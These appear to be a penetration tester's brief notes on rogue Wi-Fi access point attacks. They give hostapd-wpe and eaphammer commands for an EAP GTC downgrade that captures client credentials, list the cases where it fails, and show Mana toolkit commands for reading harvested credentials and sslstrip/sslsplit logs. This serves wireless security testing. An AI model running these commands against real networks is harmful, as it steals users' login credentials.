Rogue AP and MANA

Rogue AP - EAP

hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf
GTC downgrade

Efficient against Android phones.

Efficient against iOS but it prompt for certificate.

Only a challenge-response against Windows can be captured.

Does not work if:

  • the supplicant uses a certificate based authentication since there is no inner authentication
  • the supplicant validates the server certificate
Balanced Approach (default)

Phase 1 (outer authentication):

PEAP,TTLS,TLS,FAST

Phase 2 (inner authentication):

GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5

Explicite GTC downgrade

./eaphammer --interface <wlan0> --negotiate gtc-downgrade --auth wpa-eap --essid <ESSID> --creds [--hw-mode <g/a>] [-c <channel>] [-b <BSSID>]

Rogue AP - OPEN or PSK

Mana

Mana is deprecated
I use a custom dedicated kali VM

Start Mana - Custom script

/usr/share/mana-toolkit/run-mana/b00m.sh

Loot

cat /var/lib/mana-toolkit/net-creds*
cat /var/lib/mana-toolkit/sslsplit-connect*
cat /var/lib/mana-toolkit/sslstrip.log*
strings /var/lib/mana-toolkit/sslsplit/* | grep -i <keywork>